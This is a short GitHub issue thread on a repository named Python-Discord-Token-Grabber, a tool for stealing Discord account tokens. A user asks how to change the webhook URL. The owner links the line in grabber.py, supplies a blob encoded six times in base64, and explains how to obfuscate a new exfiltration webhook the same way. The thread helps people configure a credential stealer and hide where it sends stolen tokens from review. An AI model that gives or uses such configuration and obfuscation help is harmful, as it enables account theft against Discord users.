### ISSUE TITLE
can i change the webhook url?

### ISSUE THREAD

**Issue by NiNj4HAX** [HideakiAtsuyo/Python-Discord-Token-Grabber#1]
can i change the webhook url?

if i can, then how can you tell me?

**Comment by HideakiAtsuyo** [comment]
https://github.com/HideakiAtsuyo/Python-Discord-Token-Grabber/blob/master/grabber.py#L13

`VmpGYVYySXhWWGROVldoVllUSjRWbFpyV25kVWJIQlhWVzVPYWxadFVsaFhXSEJIWVVaSmQwNVVSbHBXUlRWWVYxWmFTbVZYVmtWWGJHaFhVbGR6ZUZkc1dtRmtNVTVIVTI1V1lWSXpRbE5hVjNoaFpVWmtXR05GY0d0TmJFcDZXV3RhYzFWdFNuSlRhelZWVmtWd1ZGbDZSbXRYUlRGWVQxZDBhVlpYZHpGWGExWnZaREZTV0ZadVRtaGxhMHBXVkZaYVMyUldVbkpXVkZaVFZtdHdXbGxyVlRWV01VcDBZek5rVjFJemFGUlpWekZYVm1zMVZWZHNVbGRTVkZaUlZteG9kMkp0VmtkalJXaE9WbXMxVmxSV1pGTlNNVkY0Vm01a2FFMUVSbGxVTUZKSFZsZEZlRmRzYUZWV1JWcDZWakJWTlZZeFRuSk9WazVwVm10d00xWnRNSGhOUmtwMFZtdGtXR0pyY0ZSWmJYUmhZMVpaZDFaVVJtcFNiVkl3Vkd4V2ExbFhTbFpqUm1SWFRXcEJNVmxXVlhoalZrWlpXa1pXYVZKc2NFMVdiWEJIVkRKT2MxZHVTbWhTYlZKWVZGVmFkMUpzV2tkWGJVWldZWHBXU0ZkclZtdFdWMHBaVld4b1ZWWldTbGhWZWtaWFkyeFdkR1JHVW1sV2JIQkpWakowVjJFeFZYbFdibEpXVjBkU1lWUlhNVEJOTVhCRlUydDBWbUpGU2xaVVZWRjNVRkU5UFE9PQ==` = 6 times base64

So just take your webhook go to https://www.base64encode.org/ and paste it in the textbox after just click encode and rencode him 5 times.
